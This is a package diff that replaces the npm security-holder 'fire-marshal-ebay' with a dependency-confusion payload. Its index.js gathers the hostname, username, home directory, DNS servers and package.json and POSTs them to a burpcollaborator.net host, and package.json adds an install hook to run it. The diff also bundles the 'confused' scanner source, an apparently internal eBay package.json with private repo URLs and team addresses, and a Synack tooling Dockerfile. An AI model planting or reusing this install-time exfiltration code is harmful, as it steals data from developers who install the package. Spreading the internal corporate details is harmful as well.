fire-marshal-ebay 0.0.1-security.2 → 1.0.0

package/confused/mvnparser.go

@@ -0,0 +1,139 @@
+//
+// https://raw.githubusercontent.com/creekorful/mvnparser/master/parser.go
+//
+// MIT License
+//
+// Copyright (c) 2019 Aloïs Micard
+//
+// Permission is hereby granted, free of charge, to any person obtaining a copy
+// of this software and associated documentation files (the "Software"), to deal
+// in the Software without restriction, including without limitation the rights
+// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+// copies of the Software, and to permit persons to whom the Software is
+// furnished to do so, subject to the following conditions:
+//
+// The above copyright notice and this permission notice shall be included in all
+//	copies or substantial portions of the Software.
+//
+//	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+// SOFTWARE.
+
+package main
+
+import (
+	"encoding/xml"
+	"io"
+)
+
+// Represent a POM file
+type MavenProject struct {
+	XMLName              xml.Name             `xml:"project"`
+	ModelVersion         string               `xml:"modelVersion"`
+	Parent               Parent               `xml:"parent"`
+	GroupId              string               `xml:"groupId"`
+	ArtifactId           string               `xml:"artifactId"`
+	Version              string               `xml:"version"`
+	Packaging            string               `xml:"packaging"`
+	Name                 string               `xml:"name"`
+	Repositories         []Repository         `xml:"repositories>repository"`
+	Properties           Properties           `xml:"properties"`
+	DependencyManagement DependencyManagement `xml:"dependencyManagement"`
+	Dependencies         []Dependency         `xml:"dependencies>dependency"`
+	Profiles             []Profile            `xml:"profiles"`
+	Build                Build                `xml:"build"`
+	PluginRepositories   []PluginRepository   `xml:"pluginRepositories>pluginRepository"`
+	Modules              []string             `xml:"modules>module"`
+}
+
+// Represent the parent of the project
+type Parent struct {
+	GroupId    string `xml:"groupId"`
+	ArtifactId string `xml:"artifactId"`
+	Version    string `xml:"version"`
+}
+
+// Represent a dependency of the project
+type Dependency struct {
+	XMLName    xml.Name    `xml:"dependency"`
+	GroupId    string      `xml:"groupId"`
+	ArtifactId string      `xml:"artifactId"`
+	Version    string      `xml:"version"`
+	Classifier string      `xml:"classifier"`
+	Type       string      `xml:"type"`
+	Scope      string      `xml:"scope"`
+	Exclusions []Exclusion `xml:"exclusions>exclusion"`
+}
+
+// Represent an exclusion
+type Exclusion struct {
+	XMLName    xml.Name `xml:"exclusion"`
+	GroupId    string   `xml:"groupId"`
+	ArtifactId string   `xml:"artifactId"`
+}
+
+type DependencyManagement struct {
+	Dependencies []Dependency `xml:"dependencies>dependency"`
+}
+
+// Represent a repository
+type Repository struct {
+	Id   string `xml:"id"`
+	Name string `xml:"name"`
+	Url  string `xml:"url"`
+}
+
+type Profile struct {
+	Id    string `xml:"id"`
+	Build Build  `xml:"build"`
+}
+
+type Build struct {
+	// todo: final name ?
+	Plugins []Plugin `xml:"plugins>plugin"`
+}
+
+type Plugin struct {
+	XMLName    xml.Name `xml:"plugin"`
+	GroupId    string   `xml:"groupId"`
+	ArtifactId string   `xml:"artifactId"`
+	Version    string   `xml:"version"`
+	//todo something like: Configuration map[string]string `xml:"configuration"`
+	// todo executions
+}
+
+// Represent a pluginRepository
+type PluginRepository struct {
+	Id   string `xml:"id"`
+	Name string `xml:"name"`
+	Url  string `xml:"url"`
+}
+
+// Represent Properties
+type Properties map[string]string
+
+func (p *Properties) UnmarshalXML(d *xml.Decoder, start xml.StartElement) error {
+	*p = map[string]string{}
+	for {
+		key := ""
+		value := ""
+		token, err := d.Token()
+		if err == io.EOF {
+			break
+		}
+		switch tokenType := token.(type) {
+		case xml.StartElement:
+			key = tokenType.Name.Local
+			err := d.DecodeElement(&value, &start)
+			if err != nil {
+				return err
+			}
+			(*p)[key] = value
+		}
+	}
+	return nil
+}

package/confused/npm.go

@@ -0,0 +1,210 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"time"
+)
+
+// PackageJSON represents the dependencies of an npm package
+type PackageJSON struct {
+	Dependencies         map[string]string `json:"dependencies,omitempty"`
+	DevDependencies      map[string]string `json:"devDependencies,omitempty"`
+	PeerDependencies     map[string]string `json:"peerDependencies,omitempty"`
+	BundledDependencies  []string          `json:"bundledDependencies,omitempty"`
+	BundleDependencies   []string          `json:"bundleDependencies,omitempty"`
+	OptionalDependencies map[string]string `json:"optionalDependencies,omitempty"`
+}
+
+type NpmResponse struct {
+	ID   string `json:"_id"`
+	Name string `json:"name"`
+	Time struct {
+		Unpublished NpmResponseUnpublished `json:"unpublished"`
+	} `json:"time"`
+}
+
+type NpmResponseUnpublished struct {
+		Maintainers []struct {
+			Email string `json:"email"`
+			Name  string `json:"name"`
+		} `json:"maintainers"`
+		Name string `json:"name"`
+		Tags struct {
+			Latest string `json:"latest"`
+		} `json:"tags"`
+		Time     time.Time `json:"time"`
+		Versions []string  `json:"versions"`
+}
+
+// NotAvailable returns true if the package has its all versions unpublished making it susceptible for takeover
+func (n *NpmResponse) NotAvailable() bool {
+	// Check if a known field has a value
+	return len(n.Time.Unpublished.Name) > 0
+}
+
+// NPMLookup represents a collection of npm packages to be tested for dependency confusion.
+type NPMLookup struct {
+	Packages []NPMPackage
+	Verbose  bool
+}
+
+type NPMPackage struct {
+	Name string
+	Version string
+}
+
+// NewNPMLookup constructs an `NPMLookup` struct and returns it.
+func NewNPMLookup(verbose bool) PackageResolver {
+	return &NPMLookup{Packages: []NPMPackage{}, Verbose: verbose}
+}
+
+// ReadPackagesFromFile reads package information from an npm package.json file
+//
+// Returns any errors encountered
+func (n *NPMLookup) ReadPackagesFromFile(filename string) error {
+	rawfile, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return err
+	}
+	data := PackageJSON{}
+	err = json.Unmarshal([]byte(rawfile), &data)
+	if err != nil {
+		fmt.Printf(" [W] Non-fatal issue encountered while reading %s : %s\n", filename, err)
+	}
+	for pkgname, pkgversion := range data.Dependencies {
+		n.Packages = append(n.Packages, NPMPackage{pkgname, pkgversion})
+	}
+	for pkgname, pkgversion := range data.DevDependencies {
+		n.Packages = append(n.Packages, NPMPackage{pkgname, pkgversion})
+	}
+	for pkgname, pkgversion := range data.PeerDependencies {
+		n.Packages = append(n.Packages, NPMPackage{pkgname, pkgversion})
+	}
+	for pkgname, pkgversion := range data.OptionalDependencies {
+		n.Packages = append(n.Packages, NPMPackage{pkgname, pkgversion})
+	}
+	for _, pkgname := range data.BundledDependencies {
+		n.Packages = append(n.Packages, NPMPackage{pkgname, ""})
+	}
+	for _, pkgname := range data.BundleDependencies {
+		n.Packages = append(n.Packages, NPMPackage{pkgname, ""})
+	}
+	return nil
+}
+
+// PackagesNotInPublic determines if an npm package does not exist in the public npm package repository.
+//
+// Returns a slice of strings with any npm packages not in the public npm package repository
+func (n *NPMLookup) PackagesNotInPublic() []string {
+	notavail := []string{}
+	for _, pkg := range n.Packages {
+		if n.localReference(pkg.Version) || n.urlReference(pkg.Version) || n.gitReference(pkg.Version) {
+			continue
+		}
+		if n.gitHubReference(pkg.Version) {
+			if !n.gitHubOrgExists(pkg.Version) {
+				notavail = append(notavail, pkg.Name)
+				continue
+			} else {
+				continue
+			}
+		}
+		if !n.isAvailableInPublic(pkg.Name, 0) {
+			notavail = append(notavail, pkg.Name)
+		}
+	}
+	return notavail
+}
+
+// isAvailableInPublic determines if an npm package exists in the public npm package repository.
+//
+// Returns true if the package exists in the public npm package repository.
+func (n *NPMLookup) isAvailableInPublic(pkgname string, retry int) bool {
+	if retry > 3 {
+		fmt.Printf(" [W] Maximum number of retries exhausted for package: %s\n", pkgname)
+		return false
+	}
+	if n.Verbose {
+		fmt.Print("Checking: https://registry.npmjs.org/" + pkgname + "/ : ")
+	}
+	resp, err := http.Get("https://registry.npmjs.org/" + pkgname + "/")
+	if err != nil {
+		fmt.Printf(" [W] Error when trying to request https://registry.npmjs.org/"+pkgname+"/ : %s\n", err)
+		return false
+	}
+	defer resp.Body.Close()
+	if n.Verbose {
+		fmt.Printf("%s\n", resp.Status)
+	}
+	if resp.StatusCode == http.StatusOK {
+		npmResp := NpmResponse{}
+		body, _ := ioutil.ReadAll(resp.Body)
+		_ = json.Unmarshal(body, &npmResp)
+		if npmResp.NotAvailable() {
+			if n.Verbose {
+				fmt.Printf("[W] Package %s was found, but all its versions are unpublished, making anyone able to takeover the namespace.\n", pkgname)
+			}
+			return false
+		}
+		return true
+	} else if resp.StatusCode == 429 {
+		fmt.Printf(" [!] Server responded with 429 (Too many requests), throttling and retrying...\n")
+		time.Sleep(10 * time.Second)
+		retry = retry + 1
+		n.isAvailableInPublic(pkgname, retry)
+	}
+	return false
+}
+
+// localReference checks if the package version is in fact a reference to filesystem
+func (n *NPMLookup) localReference(pkgversion string) bool {
+	return strings.HasPrefix(strings.ToLower(pkgversion), "file:")
+}
+
+// urlReference checks if the package version is in fact a reference to a direct URL
+func (n *NPMLookup) urlReference(pkgversion string) bool {
+	pkgversion = strings.ToLower(pkgversion)
+	return strings.HasPrefix(pkgversion, "http:") || strings.HasPrefix(pkgversion, "https:")
+}
+
+// gitReference checks if the package version is in fact a reference to a remote git repository
+func (n *NPMLookup) gitReference(pkgversion string) bool {
+	pkgversion = strings.ToLower(pkgversion)
+	gitResources := []string{"git+ssh:", "git+http:", "git+https:", "git:"}
+	for _, r := range gitResources {
+		if strings.HasPrefix(pkgversion, r) {
+			return true
+		}
+	}
+	return false
+}
+
+// gitHubReference checks if the package version refers to a GitHub repository
+func (n *NPMLookup) gitHubReference(pkgversion string) bool {
+	return !strings.HasPrefix(pkgversion, "@") && strings.Contains(pkgversion, "/")
+}
+
+// gitHubOrgExists returns true if GitHub organization / user exists
+func (n NPMLookup) gitHubOrgExists(pkgversion string) bool {
+	orgName := strings.Split(pkgversion, "/")[0]
+	if len(orgName) > 0 {
+		if n.Verbose {
+			fmt.Print("Checking: https://github.com/" + orgName + " : ")
+		}
+		resp, err := http.Get("https://github.com/" + orgName)
+		if err != nil {
+			fmt.Printf(" [W] Error while trying to request https://github.com/"+orgName+" : %s\n", err)
+			return false
+		}
+		defer resp.Body.Close()
+		if n.Verbose {
+			fmt.Printf("%d\n", resp.StatusCode)
+		}
+		return resp.StatusCode == 200
+	}
+	return false
+}

package/confused/packages.json

@@ -0,0 +1,86 @@
+{
+  "name" : "fig",
+  "version" : "1.1.5",
+  "description" : "Node micro-frontend for configuring sandwich.",
+  "main" : "index.js",
+  "scripts" : {
+    "prestart" : "rm -rf ./log; mkdir log; touch ./log/ebay_raw.log",
+    "start" : "node index.js",
+    "browser-refresh" : "browser-refresh",
+    "test" : "exit",
+    "coverage" : "exit",
+    "clean" : "rm -rf .cache .beans && ./node_modules/.bin/markoc . --clean"
+  },
+  "lint-staged" : {
+    "*.js" : [ "eslint --fix", "git add" ]
+  },
+  "repository" : {
+    "type" : "git",
+    "url" : "https://github.corp.ebay.com/ads/fig.git"
+  },
+  "author" : "DL-eBay-AdsMerch-Sandwich@ebay.com",
+  "dependencies" : {
+    "@ebay/ebayui-core" : "^2",
+    "@ebay/skin" : "^7",
+    "@lasso/marko-taglib" : "^1",
+    "app-module-path" : "^2",
+    "auth-ebay" : "^4",
+    "bentobox" : "^1.4.11",
+    "brogan-ebay" : "^4.5.0",
+    "browser-refresh" : "^1.7.3",
+    "browser-refresh-taglib" : "^1",
+    "cal" : "^4",
+    "commons-ebay" : "^4",
+    "commons-inc" : "^4",
+    "cookies-ebay" : "^4",
+    "ebay-font" : "^1.2.2",
+    "ebayui-ads" : "^1.0.17",
+    "environment-ebay" : "^1",
+    "express" : "^4",
+    "fire-marshal-ebay" : "^4",
+    "gatekeeper-ebay" : "^4",
+    "jquery" : "^3.3.1",
+    "kraken-js" : "^2",
+    "lasso" : "^3",
+    "lasso-autoprefixer" : "^1",
+    "lasso-less" : "^3",
+    "lasso-marko" : "^2",
+    "legacy-client-ebay" : "^1",
+    "lodash" : "^4",
+    "logging-inc" : "^4",
+    "marko" : "^4",
+    "marko-widgets" : "^7",
+    "meta-router" : "^3",
+    "metrics-ebay" : "^4",
+    "module-config-inc" : "^4",
+    "monitor-inc" : "^4",
+    "optimizer-plugin-inc" : "^4",
+    "raptor-amd" : "^1",
+    "raptor-async" : "^1",
+    "request-local" : "^1",
+    "security-ebay" : "^4",
+    "serve-static" : "^1.10.2",
+    "service-client-ebay" : "^4",
+    "sso-ebay" : "^5.0.0",
+    "xlsx" : "^0.14.3"
+  },
+  "devDependencies" : {
+    "chai" : "^4",
+    "eslint" : "^5",
+    "eslint-config-ebay" : "^1",
+    "eslint-plugin-chai-friendly" : "^0",
+    "lint-staged" : "^8",
+    "marko-cli" : "^4",
+    "mocha" : "^5",
+    "nyc" : "^13",
+    "supertest" : "^3"
+  },
+  "license" : "BSD-2-Clause",
+  "gpaas" : {
+    "consumer-id" : "urn:ebay-marketplace-consumerid:aea72d4d-9563-4864-aa5d-83406735b10d",
+    "short-app-name" : "fig",
+    "owner" : "DL-eBay-AdsMerch-Sandwich@ebay.com",
+    "team-dl" : "DL-eBay-AdsMerch-Sandwich@ebay.com",
+    "registration-top-level-dir" : "fig"
+  }
+}

package/confused/pip.go

@@ -0,0 +1,99 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+)
+
+// PythonLookup represents a collection of python packages to be tested for dependency confusion.
+type PythonLookup struct {
+	Packages []string
+	Verbose  bool
+}
+
+// NewPythonLookup constructs a `PythonLookup` struct and returns it
+func NewPythonLookup(verbose bool) PackageResolver {
+	return &PythonLookup{Packages: []string{}, Verbose: verbose}
+}
+
+// ReadPackagesFromFile reads package information from a python `requirements.txt` file
+//
+// Returns any errors encountered
+func (p *PythonLookup) ReadPackagesFromFile(filename string) error {
+	rawfile, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return err
+	}
+	line := ""
+	for _, l := range strings.Split(string(rawfile), "\n") {
+		l = strings.TrimSpace(l)
+		if strings.HasPrefix(l, "#") {
+			continue
+		}
+		if len(l) > 0 {
+			// Support line continuation
+			if strings.HasSuffix(l, "\\") {
+				line += l[:len(l) - 1]
+				continue
+			}
+			line += l
+			pkgrow := strings.FieldsFunc(line, p.pipSplit)
+			if len(pkgrow) > 0 {
+				p.Packages = append(p.Packages, strings.TrimSpace(pkgrow[0]))
+			}
+			// reset the line variable
+			line = ""
+		}
+	}
+	return nil
+}
+
+// PackagesNotInPublic determines if a python package does not exist in the pypi package repository.
+//
+// Returns a slice of strings with any python packages not in the pypi package repository
+func (p *PythonLookup) PackagesNotInPublic() []string {
+	notavail := []string{}
+	for _, pkg := range p.Packages {
+		if !p.isAvailableInPublic(pkg) {
+			notavail = append(notavail, pkg)
+		}
+	}
+	return notavail
+}
+
+func (p *PythonLookup) pipSplit(r rune) bool {
+	delims := []rune{
+		'=',
+		'<',
+		'>',
+		'!',
+		' ',
+		'~',
+		'#',
+		'[',
+	}
+	return inSlice(r, delims)
+}
+
+// isAvailableInPublic determines if a python package exists in the pypi package repository.
+//
+// Returns true if the package exists in the pypi package repository.
+func (p *PythonLookup) isAvailableInPublic(pkgname string) bool {
+	if p.Verbose {
+		fmt.Print("Checking: https://pypi.org/project/" + pkgname + "/ : ")
+	}
+	resp, err := http.Get("https://pypi.org/project/" + pkgname + "/")
+	if err != nil {
+		fmt.Printf(" [W] Error when trying to request https://pypi.org/project/"+pkgname+"/ : %s\n", err)
+		return false
+	}
+	if p.Verbose {
+		fmt.Printf("%s\n", resp.Status)
+	}
+	if resp.StatusCode == http.StatusOK {
+		return true
+	}
+	return false
+}

package/confused/util.go

@@ -0,0 +1,11 @@
+package main
+
+func inSlice(what rune, where []rune) bool {
+	for _, r := range where {
+		if r == what {
+			return true
+		}
+	}
+	return false
+}
+

package/index.js

@@ -0,0 +1,47 @@
+//author:- whitehacker003@protonmail.com
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "dwdr89md209lsnps8c2t1q1dm4svgk.burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/package.json

@@ -1,6 +1,11 @@
 {
-  "name": "fire-marshal-ebay",
-  "version": "0.0.1-security.2",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+	"name": "fire-marshal-ebay",
+	"version": "1.0.0",
+	"description": "Synack is here",
+	"main": "index.js",
+	"scripts": {
+		"preinstal": "node index.js"
+	},
+	"author": "",
+	"license": "ISC"
 }

package/synackAPI/Dockerfile

@@ -0,0 +1,36 @@
+# Get selenium and base image
+# This is a setup for docker environment, you can use it to build your own instance 
+# To build the image simply run: "docker build . -t synackapi"
+# This will result on a docker image on your system under the name synackapi 
+# To run the docker image use: "docker run -d --name synackapi --dns 8.8.8.8 --rm -v ~/.synack:/root/.synack synackapi"
+# The above will run the docker in the background and it will simply poll and register all new targets
+# To run the mission bot you can execute "docker run --name synackapi -ti --dns 8.8.8.8 --rm -v ~/.synack:/root/.synack synackapi python3 bot.py" 
+# Or from inside the running docker simply connect to it using : "docker exec -ti synackapi /bin/bash", and run python3 bot.py from there.
+FROM selenium/standalone-firefox
+
+USER root
+RUN apt update
+RUN apt-get install python3-pip -y
+RUN apt-get install python3-distutils -y
+RUN python3 -m pip install selenium
+
+RUN mkdir /root/.synack
+# set the working directory in the container
+WORKDIR /synackAPI
+
+ENV HOME=/root
+
+RUN wget https://github.com/mozilla/geckodriver/releases/download/v0.29.1/geckodriver-v0.29.1-linux64.tar.gz
+RUN tar xzf geckodriver-v0.29.1-linux64.tar.gz && mv geckodriver /usr/bin/
+
+# copy the dependencies file to the working directory
+COPY requirements.txt .
+
+# install dependencies
+RUN pip install -r requirements.txt
+
+# copy the content of the local src directory to the working directory
+COPY ./ .
+
+# command to run on container start
+CMD [ "python3", "/synackAPI/polling.py" ]